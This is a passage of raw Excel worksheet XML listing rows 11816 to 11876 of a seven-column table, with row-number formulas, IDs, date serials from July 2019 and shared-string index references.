    <row r="11816" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11816">
        <f t="shared" si="184"/>
        <v>11815</v>
      </c>
      <c r="B11816">
        <v>1815</v>
      </c>
      <c r="C11816" t="s">
        <v>19637</v>
      </c>
      <c r="D11816" s="1">
        <v>43672</v>
      </c>
      <c r="E11816" t="s">
        <v>19648</v>
      </c>
      <c r="F11816" t="s">
        <v>10021</v>
      </c>
      <c r="G11816" t="s">
        <v>21907</v>
      </c>
    </row>
    <row r="11817" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11817">
        <f t="shared" si="184"/>
        <v>11816</v>
      </c>
      <c r="B11817">
        <v>1816</v>
      </c>
      <c r="C11817" t="s">
        <v>19637</v>
      </c>
      <c r="D11817" s="1">
        <v>43674</v>
      </c>
      <c r="E11817" t="s">
        <v>19648</v>
      </c>
      <c r="F11817" t="s">
        <v>10021</v>
      </c>
      <c r="G11817" t="s">
        <v>21908</v>
      </c>
    </row>
    <row r="11818" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11818">
        <f t="shared" si="184"/>
        <v>11817</v>
      </c>
      <c r="B11818">
        <v>1817</v>
      </c>
      <c r="C11818" t="s">
        <v>19637</v>
      </c>
      <c r="D11818" s="1">
        <v>43675</v>
      </c>
      <c r="E11818" t="s">
        <v>19648</v>
      </c>
      <c r="F11818" t="s">
        <v>10021</v>
      </c>
      <c r="G11818" t="s">
        <v>21909</v>
      </c>
    </row>
    <row r="11819" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11819">
        <f t="shared" si="184"/>
        <v>11818</v>
      </c>
      <c r="B11819">
        <v>1818</v>
      </c>
      <c r="C11819" t="s">
        <v>19637</v>
      </c>
      <c r="D11819" s="1">
        <v>43673</v>
      </c>
      <c r="E11819" t="s">
        <v>19650</v>
      </c>
      <c r="F11819" t="s">
        <v>10021</v>
      </c>
      <c r="G11819" t="s">
        <v>21910</v>
      </c>
    </row>
    <row r="11820" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11820">
        <f t="shared" si="184"/>
        <v>11819</v>
      </c>
      <c r="B11820">
        <v>1819</v>
      </c>
      <c r="C11820" t="s">
        <v>19637</v>
      </c>
      <c r="D11820" s="1">
        <v>43674</v>
      </c>
      <c r="E11820" t="s">
        <v>19640</v>
      </c>
      <c r="F11820" t="s">
        <v>10021</v>
      </c>
      <c r="G11820" t="s">
        <v>21911</v>
      </c>
    </row>
    <row r="11821" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11821">
        <f t="shared" si="184"/>
        <v>11820</v>
      </c>
      <c r="B11821">
        <v>1820</v>
      </c>
      <c r="C11821" t="s">
        <v>19637</v>
      </c>
      <c r="D11821" s="1">
        <v>43668</v>
      </c>
      <c r="E11821" t="s">
        <v>19796</v>
      </c>
      <c r="F11821" t="s">
        <v>10021</v>
      </c>
      <c r="G11821" t="s">
        <v>21912</v>
      </c>
    </row>
    <row r="11822" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11822">
        <f t="shared" si="184"/>
        <v>11821</v>
      </c>
      <c r="B11822">
        <v>1821</v>
      </c>
      <c r="C11822" t="s">
        <v>19637</v>
      </c>
      <c r="D11822" s="1">
        <v>43668</v>
      </c>
      <c r="E11822" t="s">
        <v>19690</v>
      </c>
      <c r="F11822" t="s">
        <v>9978</v>
      </c>
      <c r="G11822" t="s">
        <v>21913</v>
      </c>
    </row>
    <row r="11823" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11823">
        <f t="shared" si="184"/>
        <v>11822</v>
      </c>
      <c r="B11823">
        <v>1822</v>
      </c>
      <c r="C11823" t="s">
        <v>19637</v>
      </c>
      <c r="D11823" s="1">
        <v>43673</v>
      </c>
      <c r="F11823" t="s">
        <v>10021</v>
      </c>
      <c r="G11823" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="11824" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11824">
        <f t="shared" si="184"/>
        <v>11823</v>
      </c>
      <c r="B11824">
        <v>1823</v>
      </c>
      <c r="C11824" t="s">
        <v>19637</v>
      </c>
      <c r="D11824" s="1">
        <v>43677</v>
      </c>
      <c r="E11824" t="s">
        <v>19650</v>
      </c>
      <c r="F11824" t="s">
        <v>10021</v>
      </c>
      <c r="G11824" t="s">
        <v>21914</v>
      </c>
    </row>
    <row r="11825" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11825">
        <f t="shared" si="184"/>
        <v>11824</v>
      </c>
      <c r="B11825">
        <v>1824</v>
      </c>
      <c r="C11825" t="s">
        <v>19637</v>
      </c>
      <c r="D11825" s="1">
        <v>43673</v>
      </c>
      <c r="E11825" t="s">
        <v>21519</v>
      </c>
      <c r="F11825" t="s">
        <v>10021</v>
      </c>
      <c r="G11825" t="s">
        <v>21915</v>
      </c>
    </row>
    <row r="11826" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11826">
        <f t="shared" si="184"/>
        <v>11825</v>
      </c>
      <c r="B11826">
        <v>1825</v>
      </c>
      <c r="C11826" t="s">
        <v>19637</v>
      </c>
      <c r="D11826" s="1">
        <v>43676</v>
      </c>
      <c r="E11826" t="s">
        <v>19668</v>
      </c>
      <c r="F11826" t="s">
        <v>9978</v>
      </c>
      <c r="G11826" t="s">
        <v>21916</v>
      </c>
    </row>
    <row r="11827" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11827">
        <f t="shared" si="184"/>
        <v>11826</v>
      </c>
      <c r="B11827">
        <v>1826</v>
      </c>
      <c r="C11827" t="s">
        <v>19637</v>
      </c>
      <c r="D11827" s="1">
        <v>43669</v>
      </c>
      <c r="E11827" t="s">
        <v>19879</v>
      </c>
      <c r="F11827" t="s">
        <v>10021</v>
      </c>
      <c r="G11827" t="s">
        <v>21917</v>
      </c>
    </row>
    <row r="11828" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11828">
        <f t="shared" si="184"/>
        <v>11827</v>
      </c>
      <c r="B11828">
        <v>1827</v>
      </c>
      <c r="C11828" t="s">
        <v>19637</v>
      </c>
      <c r="D11828" s="1">
        <v>43668</v>
      </c>
      <c r="E11828" t="s">
        <v>21918</v>
      </c>
      <c r="F11828" t="s">
        <v>10021</v>
      </c>
      <c r="G11828" t="s">
        <v>21919</v>
      </c>
    </row>
    <row r="11829" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11829">
        <f t="shared" si="184"/>
        <v>11828</v>
      </c>
      <c r="B11829">
        <v>1828</v>
      </c>
      <c r="C11829" t="s">
        <v>19637</v>
      </c>
      <c r="D11829" s="1">
        <v>43676</v>
      </c>
      <c r="E11829" t="s">
        <v>21920</v>
      </c>
      <c r="F11829" t="s">
        <v>10526</v>
      </c>
      <c r="G11829" t="s">
        <v>21921</v>
      </c>
    </row>
    <row r="11830" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11830">
        <f t="shared" si="184"/>
        <v>11829</v>
      </c>
      <c r="B11830">
        <v>1829</v>
      </c>
      <c r="C11830" t="s">
        <v>19637</v>
      </c>
      <c r="D11830" s="1">
        <v>43671</v>
      </c>
      <c r="F11830" t="s">
        <v>9978</v>
      </c>
      <c r="G11830" t="s">
        <v>21922</v>
      </c>
    </row>
    <row r="11831" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11831">
        <f t="shared" si="184"/>
        <v>11830</v>
      </c>
      <c r="B11831">
        <v>1830</v>
      </c>
      <c r="C11831" t="s">
        <v>19637</v>
      </c>
      <c r="D11831" s="1">
        <v>43674</v>
      </c>
      <c r="E11831" t="s">
        <v>19840</v>
      </c>
      <c r="F11831" t="s">
        <v>10021</v>
      </c>
      <c r="G11831" t="s">
        <v>21923</v>
      </c>
    </row>
    <row r="11832" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11832">
        <f t="shared" si="184"/>
        <v>11831</v>
      </c>
      <c r="B11832">
        <v>1831</v>
      </c>
      <c r="C11832" t="s">
        <v>19637</v>
      </c>
      <c r="D11832" s="1">
        <v>43674</v>
      </c>
      <c r="E11832" t="s">
        <v>19690</v>
      </c>
      <c r="F11832" t="s">
        <v>9978</v>
      </c>
      <c r="G11832" t="s">
        <v>21924</v>
      </c>
    </row>
    <row r="11833" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11833">
        <f t="shared" si="184"/>
        <v>11832</v>
      </c>
      <c r="B11833">
        <v>1832</v>
      </c>
      <c r="C11833" t="s">
        <v>19637</v>
      </c>
      <c r="D11833" s="1">
        <v>43668</v>
      </c>
      <c r="E11833" t="s">
        <v>19902</v>
      </c>
      <c r="F11833" t="s">
        <v>9975</v>
      </c>
      <c r="G11833" t="s">
        <v>21925</v>
      </c>
    </row>
    <row r="11834" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11834">
        <f t="shared" si="184"/>
        <v>11833</v>
      </c>
      <c r="B11834">
        <v>1833</v>
      </c>
      <c r="C11834" t="s">
        <v>19637</v>
      </c>
      <c r="D11834" s="1">
        <v>43677</v>
      </c>
      <c r="E11834" t="s">
        <v>20005</v>
      </c>
      <c r="F11834" t="s">
        <v>9975</v>
      </c>
      <c r="G11834" t="s">
        <v>21926</v>
      </c>
    </row>
    <row r="11835" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11835">
        <f t="shared" si="184"/>
        <v>11834</v>
      </c>
      <c r="B11835">
        <v>1834</v>
      </c>
      <c r="C11835" t="s">
        <v>19637</v>
      </c>
      <c r="D11835" s="1">
        <v>43672</v>
      </c>
      <c r="E11835" t="s">
        <v>19640</v>
      </c>
      <c r="F11835" t="s">
        <v>10021</v>
      </c>
      <c r="G11835" t="s">
        <v>21927</v>
      </c>
    </row>
    <row r="11836" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11836">
        <f t="shared" si="184"/>
        <v>11835</v>
      </c>
      <c r="B11836">
        <v>1835</v>
      </c>
      <c r="C11836" t="s">
        <v>19637</v>
      </c>
      <c r="D11836" s="1">
        <v>43676</v>
      </c>
      <c r="E11836" t="s">
        <v>21928</v>
      </c>
      <c r="F11836" t="s">
        <v>9975</v>
      </c>
      <c r="G11836" t="s">
        <v>21929</v>
      </c>
    </row>
    <row r="11837" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11837">
        <f t="shared" si="184"/>
        <v>11836</v>
      </c>
      <c r="B11837">
        <v>1836</v>
      </c>
      <c r="C11837" t="s">
        <v>19637</v>
      </c>
      <c r="D11837" s="1">
        <v>43677</v>
      </c>
      <c r="E11837" t="s">
        <v>21930</v>
      </c>
      <c r="F11837" t="s">
        <v>10526</v>
      </c>
      <c r="G11837" t="s">
        <v>21931</v>
      </c>
    </row>
    <row r="11838" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11838">
        <f t="shared" si="184"/>
        <v>11837</v>
      </c>
      <c r="B11838">
        <v>1837</v>
      </c>
      <c r="C11838" t="s">
        <v>19637</v>
      </c>
      <c r="D11838" s="1">
        <v>43671</v>
      </c>
      <c r="E11838" t="s">
        <v>21287</v>
      </c>
      <c r="F11838" t="s">
        <v>10526</v>
      </c>
      <c r="G11838" t="s">
        <v>21288</v>
      </c>
    </row>
    <row r="11839" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11839">
        <f t="shared" si="184"/>
        <v>11838</v>
      </c>
      <c r="B11839">
        <v>1838</v>
      </c>
      <c r="C11839" t="s">
        <v>19637</v>
      </c>
      <c r="D11839" s="1">
        <v>43669</v>
      </c>
      <c r="E11839" t="s">
        <v>21389</v>
      </c>
      <c r="F11839" t="s">
        <v>9975</v>
      </c>
      <c r="G11839" t="s">
        <v>21932</v>
      </c>
    </row>
    <row r="11840" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11840">
        <f t="shared" si="184"/>
        <v>11839</v>
      </c>
      <c r="B11840">
        <v>1839</v>
      </c>
      <c r="C11840" t="s">
        <v>19637</v>
      </c>
      <c r="D11840" s="1">
        <v>43675</v>
      </c>
      <c r="E11840" t="s">
        <v>20288</v>
      </c>
      <c r="F11840" t="s">
        <v>10021</v>
      </c>
      <c r="G11840" t="s">
        <v>21933</v>
      </c>
    </row>
    <row r="11841" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11841">
        <f t="shared" si="184"/>
        <v>11840</v>
      </c>
      <c r="B11841">
        <v>1840</v>
      </c>
      <c r="C11841" t="s">
        <v>19637</v>
      </c>
      <c r="D11841" s="1">
        <v>43674</v>
      </c>
      <c r="E11841" t="s">
        <v>21934</v>
      </c>
      <c r="F11841" t="s">
        <v>10021</v>
      </c>
      <c r="G11841" t="s">
        <v>21935</v>
      </c>
    </row>
    <row r="11842" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11842">
        <f t="shared" si="184"/>
        <v>11841</v>
      </c>
      <c r="B11842">
        <v>1841</v>
      </c>
      <c r="C11842" t="s">
        <v>19637</v>
      </c>
      <c r="D11842" s="1">
        <v>43671</v>
      </c>
      <c r="F11842" t="s">
        <v>9975</v>
      </c>
      <c r="G11842" t="s">
        <v>21936</v>
      </c>
    </row>
    <row r="11843" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11843">
        <f t="shared" ref="A11843:A11906" si="185">+ROW(A11842)</f>
        <v>11842</v>
      </c>
      <c r="B11843">
        <v>1842</v>
      </c>
      <c r="C11843" t="s">
        <v>19637</v>
      </c>
      <c r="D11843" s="1">
        <v>43677</v>
      </c>
      <c r="E11843" t="s">
        <v>21937</v>
      </c>
      <c r="F11843" t="s">
        <v>10021</v>
      </c>
      <c r="G11843" t="s">
        <v>21938</v>
      </c>
    </row>
    <row r="11844" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11844">
        <f t="shared" si="185"/>
        <v>11843</v>
      </c>
      <c r="B11844">
        <v>1843</v>
      </c>
      <c r="C11844" t="s">
        <v>19637</v>
      </c>
      <c r="D11844" s="1">
        <v>43676</v>
      </c>
      <c r="E11844" t="s">
        <v>21939</v>
      </c>
      <c r="F11844" t="s">
        <v>9978</v>
      </c>
      <c r="G11844" t="s">
        <v>21940</v>
      </c>
    </row>
    <row r="11845" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11845">
        <f t="shared" si="185"/>
        <v>11844</v>
      </c>
      <c r="B11845">
        <v>1844</v>
      </c>
      <c r="C11845" t="s">
        <v>19637</v>
      </c>
      <c r="D11845" s="1">
        <v>43675</v>
      </c>
      <c r="E11845" t="s">
        <v>19672</v>
      </c>
      <c r="F11845" t="s">
        <v>10021</v>
      </c>
      <c r="G11845" t="s">
        <v>21941</v>
      </c>
    </row>
    <row r="11846" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11846">
        <f t="shared" si="185"/>
        <v>11845</v>
      </c>
      <c r="B11846">
        <v>1845</v>
      </c>
      <c r="C11846" t="s">
        <v>19637</v>
      </c>
      <c r="D11846" s="1">
        <v>43672</v>
      </c>
      <c r="E11846" t="s">
        <v>21942</v>
      </c>
      <c r="F11846" t="s">
        <v>10526</v>
      </c>
      <c r="G11846" t="s">
        <v>21943</v>
      </c>
    </row>
    <row r="11847" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11847">
        <f t="shared" si="185"/>
        <v>11846</v>
      </c>
      <c r="B11847">
        <v>1846</v>
      </c>
      <c r="C11847" t="s">
        <v>19637</v>
      </c>
      <c r="D11847" s="1">
        <v>43669</v>
      </c>
      <c r="E11847" t="s">
        <v>20837</v>
      </c>
      <c r="F11847" t="s">
        <v>9978</v>
      </c>
      <c r="G11847" t="s">
        <v>21944</v>
      </c>
    </row>
    <row r="11848" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11848">
        <f t="shared" si="185"/>
        <v>11847</v>
      </c>
      <c r="B11848">
        <v>1847</v>
      </c>
      <c r="C11848" t="s">
        <v>19637</v>
      </c>
      <c r="D11848" s="1">
        <v>43676</v>
      </c>
      <c r="E11848" t="s">
        <v>21945</v>
      </c>
      <c r="F11848" t="s">
        <v>10526</v>
      </c>
      <c r="G11848" t="s">
        <v>21946</v>
      </c>
    </row>
    <row r="11849" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11849">
        <f t="shared" si="185"/>
        <v>11848</v>
      </c>
      <c r="B11849">
        <v>1848</v>
      </c>
      <c r="C11849" t="s">
        <v>19637</v>
      </c>
      <c r="D11849" s="1">
        <v>43670</v>
      </c>
      <c r="E11849" t="s">
        <v>21269</v>
      </c>
      <c r="F11849" t="s">
        <v>10526</v>
      </c>
      <c r="G11849" t="s">
        <v>21947</v>
      </c>
    </row>
    <row r="11850" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11850">
        <f t="shared" si="185"/>
        <v>11849</v>
      </c>
      <c r="B11850">
        <v>1849</v>
      </c>
      <c r="C11850" t="s">
        <v>19637</v>
      </c>
      <c r="D11850" s="1">
        <v>43675</v>
      </c>
      <c r="E11850" t="s">
        <v>21389</v>
      </c>
      <c r="F11850" t="s">
        <v>9975</v>
      </c>
      <c r="G11850" t="s">
        <v>21948</v>
      </c>
    </row>
    <row r="11851" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11851">
        <f t="shared" si="185"/>
        <v>11850</v>
      </c>
      <c r="B11851">
        <v>1850</v>
      </c>
      <c r="C11851" t="s">
        <v>19637</v>
      </c>
      <c r="D11851" s="1">
        <v>43676</v>
      </c>
      <c r="F11851" t="s">
        <v>10021</v>
      </c>
      <c r="G11851" t="s">
        <v>21949</v>
      </c>
    </row>
    <row r="11852" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11852">
        <f t="shared" si="185"/>
        <v>11851</v>
      </c>
      <c r="B11852">
        <v>1851</v>
      </c>
      <c r="C11852" t="s">
        <v>19637</v>
      </c>
      <c r="D11852" s="1">
        <v>43677</v>
      </c>
      <c r="E11852" t="s">
        <v>19650</v>
      </c>
      <c r="F11852" t="s">
        <v>10021</v>
      </c>
      <c r="G11852" t="s">
        <v>21950</v>
      </c>
    </row>
    <row r="11853" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11853">
        <f t="shared" si="185"/>
        <v>11852</v>
      </c>
      <c r="B11853">
        <v>1852</v>
      </c>
      <c r="C11853" t="s">
        <v>19637</v>
      </c>
      <c r="D11853" s="1">
        <v>43676</v>
      </c>
      <c r="E11853" t="s">
        <v>19640</v>
      </c>
      <c r="F11853" t="s">
        <v>9975</v>
      </c>
      <c r="G11853" t="s">
        <v>21951</v>
      </c>
    </row>
    <row r="11854" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11854">
        <f t="shared" si="185"/>
        <v>11853</v>
      </c>
      <c r="B11854">
        <v>1853</v>
      </c>
      <c r="C11854" t="s">
        <v>19637</v>
      </c>
      <c r="D11854" s="1">
        <v>43676</v>
      </c>
      <c r="E11854" t="s">
        <v>21952</v>
      </c>
      <c r="F11854" t="s">
        <v>10526</v>
      </c>
      <c r="G11854" t="s">
        <v>21953</v>
      </c>
    </row>
    <row r="11855" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11855">
        <f t="shared" si="185"/>
        <v>11854</v>
      </c>
      <c r="B11855">
        <v>1854</v>
      </c>
      <c r="C11855" t="s">
        <v>19637</v>
      </c>
      <c r="D11855" s="1">
        <v>43672</v>
      </c>
      <c r="E11855" t="s">
        <v>19640</v>
      </c>
      <c r="F11855" t="s">
        <v>10021</v>
      </c>
      <c r="G11855" t="s">
        <v>21954</v>
      </c>
    </row>
    <row r="11856" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11856">
        <f t="shared" si="185"/>
        <v>11855</v>
      </c>
      <c r="B11856">
        <v>1855</v>
      </c>
      <c r="C11856" t="s">
        <v>19637</v>
      </c>
      <c r="D11856" s="1">
        <v>43677</v>
      </c>
      <c r="E11856" t="s">
        <v>21389</v>
      </c>
      <c r="F11856" t="s">
        <v>9975</v>
      </c>
      <c r="G11856" t="s">
        <v>21955</v>
      </c>
    </row>
    <row r="11857" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11857">
        <f t="shared" si="185"/>
        <v>11856</v>
      </c>
      <c r="B11857">
        <v>1856</v>
      </c>
      <c r="C11857" t="s">
        <v>19637</v>
      </c>
      <c r="D11857" s="1">
        <v>43674</v>
      </c>
      <c r="E11857" t="s">
        <v>19640</v>
      </c>
      <c r="F11857" t="s">
        <v>9975</v>
      </c>
      <c r="G11857" t="s">
        <v>21956</v>
      </c>
    </row>
    <row r="11858" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11858">
        <f t="shared" si="185"/>
        <v>11857</v>
      </c>
      <c r="B11858">
        <v>1857</v>
      </c>
      <c r="C11858" t="s">
        <v>19637</v>
      </c>
      <c r="D11858" s="1">
        <v>43675</v>
      </c>
      <c r="E11858" t="s">
        <v>19840</v>
      </c>
      <c r="F11858" t="s">
        <v>10021</v>
      </c>
      <c r="G11858" t="s">
        <v>21957</v>
      </c>
    </row>
    <row r="11859" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11859">
        <f t="shared" si="185"/>
        <v>11858</v>
      </c>
      <c r="B11859">
        <v>1858</v>
      </c>
      <c r="C11859" t="s">
        <v>19637</v>
      </c>
      <c r="D11859" s="1">
        <v>43668</v>
      </c>
      <c r="F11859" t="s">
        <v>9975</v>
      </c>
      <c r="G11859" t="s">
        <v>21958</v>
      </c>
    </row>
    <row r="11860" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11860">
        <f t="shared" si="185"/>
        <v>11859</v>
      </c>
      <c r="B11860">
        <v>1859</v>
      </c>
      <c r="C11860" t="s">
        <v>19637</v>
      </c>
      <c r="D11860" s="1">
        <v>43675</v>
      </c>
      <c r="F11860" t="s">
        <v>10526</v>
      </c>
      <c r="G11860" t="s">
        <v>21959</v>
      </c>
    </row>
    <row r="11861" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11861">
        <f t="shared" si="185"/>
        <v>11860</v>
      </c>
      <c r="B11861">
        <v>1860</v>
      </c>
      <c r="C11861" t="s">
        <v>19637</v>
      </c>
      <c r="D11861" s="1">
        <v>43671</v>
      </c>
      <c r="E11861" t="s">
        <v>21287</v>
      </c>
      <c r="F11861" t="s">
        <v>10526</v>
      </c>
      <c r="G11861" t="s">
        <v>21960</v>
      </c>
    </row>
    <row r="11862" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11862">
        <f t="shared" si="185"/>
        <v>11861</v>
      </c>
      <c r="B11862">
        <v>1861</v>
      </c>
      <c r="C11862" t="s">
        <v>19637</v>
      </c>
      <c r="D11862" s="1">
        <v>43672</v>
      </c>
      <c r="E11862" t="s">
        <v>20834</v>
      </c>
      <c r="F11862" t="s">
        <v>9978</v>
      </c>
      <c r="G11862" t="s">
        <v>21961</v>
      </c>
    </row>
    <row r="11863" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11863">
        <f t="shared" si="185"/>
        <v>11862</v>
      </c>
      <c r="B11863">
        <v>1862</v>
      </c>
      <c r="C11863" t="s">
        <v>19637</v>
      </c>
      <c r="D11863" s="1">
        <v>43673</v>
      </c>
      <c r="E11863" t="s">
        <v>21962</v>
      </c>
      <c r="F11863" t="s">
        <v>10526</v>
      </c>
      <c r="G11863" t="s">
        <v>21963</v>
      </c>
    </row>
    <row r="11864" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11864">
        <f t="shared" si="185"/>
        <v>11863</v>
      </c>
      <c r="B11864">
        <v>1863</v>
      </c>
      <c r="C11864" t="s">
        <v>19637</v>
      </c>
      <c r="D11864" s="1">
        <v>43675</v>
      </c>
      <c r="E11864" t="s">
        <v>21964</v>
      </c>
      <c r="F11864" t="s">
        <v>10021</v>
      </c>
      <c r="G11864" t="s">
        <v>21965</v>
      </c>
    </row>
    <row r="11865" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11865">
        <f t="shared" si="185"/>
        <v>11864</v>
      </c>
      <c r="B11865">
        <v>1864</v>
      </c>
      <c r="C11865" t="s">
        <v>19637</v>
      </c>
      <c r="D11865" s="1">
        <v>43677</v>
      </c>
      <c r="E11865" t="s">
        <v>19849</v>
      </c>
      <c r="F11865" t="s">
        <v>10021</v>
      </c>
      <c r="G11865" t="s">
        <v>21966</v>
      </c>
    </row>
    <row r="11866" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11866">
        <f t="shared" si="185"/>
        <v>11865</v>
      </c>
      <c r="B11866">
        <v>1865</v>
      </c>
      <c r="C11866" t="s">
        <v>19637</v>
      </c>
      <c r="D11866" s="1">
        <v>43674</v>
      </c>
      <c r="E11866" t="s">
        <v>20253</v>
      </c>
      <c r="F11866" t="s">
        <v>9978</v>
      </c>
      <c r="G11866" t="s">
        <v>21967</v>
      </c>
    </row>
    <row r="11867" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11867">
        <f t="shared" si="185"/>
        <v>11866</v>
      </c>
      <c r="B11867">
        <v>1866</v>
      </c>
      <c r="C11867" t="s">
        <v>19637</v>
      </c>
      <c r="D11867" s="1">
        <v>43670</v>
      </c>
      <c r="E11867" t="s">
        <v>19879</v>
      </c>
      <c r="F11867" t="s">
        <v>10021</v>
      </c>
      <c r="G11867" t="s">
        <v>21968</v>
      </c>
    </row>
    <row r="11868" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11868">
        <f t="shared" si="185"/>
        <v>11867</v>
      </c>
      <c r="B11868">
        <v>1867</v>
      </c>
      <c r="C11868" t="s">
        <v>19637</v>
      </c>
      <c r="D11868" s="1">
        <v>43674</v>
      </c>
      <c r="E11868" t="s">
        <v>19640</v>
      </c>
      <c r="F11868" t="s">
        <v>9975</v>
      </c>
      <c r="G11868" t="s">
        <v>21969</v>
      </c>
    </row>
    <row r="11869" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11869">
        <f t="shared" si="185"/>
        <v>11868</v>
      </c>
      <c r="B11869">
        <v>1868</v>
      </c>
      <c r="C11869" t="s">
        <v>19637</v>
      </c>
      <c r="D11869" s="1">
        <v>43669</v>
      </c>
      <c r="E11869" t="s">
        <v>21970</v>
      </c>
      <c r="F11869" t="s">
        <v>10526</v>
      </c>
      <c r="G11869" t="s">
        <v>21971</v>
      </c>
    </row>
    <row r="11870" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11870">
        <f t="shared" si="185"/>
        <v>11869</v>
      </c>
      <c r="B11870">
        <v>1869</v>
      </c>
      <c r="C11870" t="s">
        <v>19637</v>
      </c>
      <c r="D11870" s="1">
        <v>43677</v>
      </c>
      <c r="E11870" t="s">
        <v>21972</v>
      </c>
      <c r="F11870" t="s">
        <v>9978</v>
      </c>
      <c r="G11870" t="s">
        <v>21973</v>
      </c>
    </row>
    <row r="11871" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11871">
        <f t="shared" si="185"/>
        <v>11870</v>
      </c>
      <c r="B11871">
        <v>1870</v>
      </c>
      <c r="C11871" t="s">
        <v>19637</v>
      </c>
      <c r="D11871" s="1">
        <v>43675</v>
      </c>
      <c r="E11871" t="s">
        <v>19638</v>
      </c>
      <c r="F11871" t="s">
        <v>10021</v>
      </c>
      <c r="G11871" t="s">
        <v>21974</v>
      </c>
    </row>
    <row r="11872" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11872">
        <f t="shared" si="185"/>
        <v>11871</v>
      </c>
      <c r="B11872">
        <v>1871</v>
      </c>
      <c r="C11872" t="s">
        <v>19637</v>
      </c>
      <c r="D11872" s="1">
        <v>43675</v>
      </c>
      <c r="E11872" t="s">
        <v>19680</v>
      </c>
      <c r="F11872" t="s">
        <v>10021</v>
      </c>
      <c r="G11872" t="s">
        <v>21975</v>
      </c>
    </row>
    <row r="11873" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11873">
        <f t="shared" si="185"/>
        <v>11872</v>
      </c>
      <c r="B11873">
        <v>1872</v>
      </c>
      <c r="C11873" t="s">
        <v>19637</v>
      </c>
      <c r="D11873" s="1">
        <v>43673</v>
      </c>
      <c r="E11873" t="s">
        <v>21976</v>
      </c>
      <c r="F11873" t="s">
        <v>10526</v>
      </c>
      <c r="G11873" t="s">
        <v>21977</v>
      </c>
    </row>
    <row r="11874" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11874">
        <f t="shared" si="185"/>
        <v>11873</v>
      </c>
      <c r="B11874">
        <v>1873</v>
      </c>
      <c r="C11874" t="s">
        <v>19637</v>
      </c>
      <c r="D11874" s="1">
        <v>43668</v>
      </c>
      <c r="E11874" t="s">
        <v>19640</v>
      </c>
      <c r="F11874" t="s">
        <v>9975</v>
      </c>
      <c r="G11874" t="s">
        <v>21978</v>
      </c>
    </row>
    <row r="11875" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11875">
        <f t="shared" si="185"/>
        <v>11874</v>
      </c>
      <c r="B11875">
        <v>1874</v>
      </c>
      <c r="C11875" t="s">
        <v>19637</v>
      </c>
      <c r="D11875" s="1">
        <v>43671</v>
      </c>
      <c r="E11875" t="s">
        <v>21415</v>
      </c>
      <c r="F11875" t="s">
        <v>10021</v>
      </c>
      <c r="G11875" t="s">
        <v>21979</v>
      </c>
    </row>
    <row r="11876" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11876">
        <f t="shared" si="185"/>
        <v>11875</v>
      </c>
      <c r="B11876">
        <v>1875</v>
      </c>
      <c r="C11876" t="s">
        <v>19637</v>
      </c>
      <c r="D11876" s="1">
        <v>43669</v>
      </c>
      <c r="E11876" t="s">
        <v>20220</v>
      </c>
      <c r="F11876" t="s">
        <v>10021</v>
      </c>
      <c r="G11876" t="s">
        <v>21980</v>
      </c>
    </row>
    <row r="11877" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11877">
        <f t="shared" si="185"/>
        <v>11876</v>
      </c>
      <c r="B11877">
        <v>1876</v>
      </c>
      <c r="C11877" t="s">
        <v>19637</v>
      </c>
      <c r="D11877" s="1">
